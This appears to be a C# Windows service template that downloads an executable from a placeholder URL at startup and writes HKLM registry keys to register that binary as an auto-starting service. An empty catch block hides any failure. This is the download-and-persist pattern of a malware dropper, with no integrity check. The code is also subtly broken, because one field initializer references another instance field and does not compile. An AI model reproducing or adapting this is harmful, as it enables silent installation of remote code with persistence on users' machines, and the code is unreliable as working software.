using System;
using System.IO;
using System.Net;
using System.ServiceProcess;
using Microsoft.Win32;

namespace FileDownloader
{
    public partial class FileDownloaderService : ServiceBase
    {
        private string fileUrl = "http://example.com/yourfile.exe";
        private string saveDirectory = @"C:\path\to\your\directory";
        private string saveFilePath = Path.Combine(saveDirectory, "yourfile.exe");
        private string serviceName = "YourServiceName";

        public FileDownloaderService()
        {
            InitializeComponent();
        }

        protected override void OnStart(string[] args)
        {
            try
            {
                // Download the file
                using (WebClient client = new WebClient())
                {
                    client.DownloadFile(fileUrl, saveFilePath);
                }

                // Register the service
                using (RegistryKey serviceKey = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services", true))
                {
                    using (RegistryKey newServiceKey = serviceKey.CreateSubKey(serviceName))
                    {
                        newServiceKey.SetValue("DelayedAutostart", 1, RegistryValueKind.DWord);
                        newServiceKey.SetValue("ImagePath", saveFilePath, RegistryValueKind.ExpandString);
                        newServiceKey.SetValue("Start", 2, RegistryValueKind.DWord);
                    }
                }
            }
            catch (Exception ex)
            {
                // Handle any exceptions here
            }
        }

        protected override void OnStop()
        {
            // Clean up resources or perform any necessary tasks upon stopping the service
        }
    }

    static class Program
    {
        static void Main()
        {
            ServiceBase[] servicesToRun = { new FileDownloaderService() };
            ServiceBase.Run(servicesToRun);
        }
    }
}
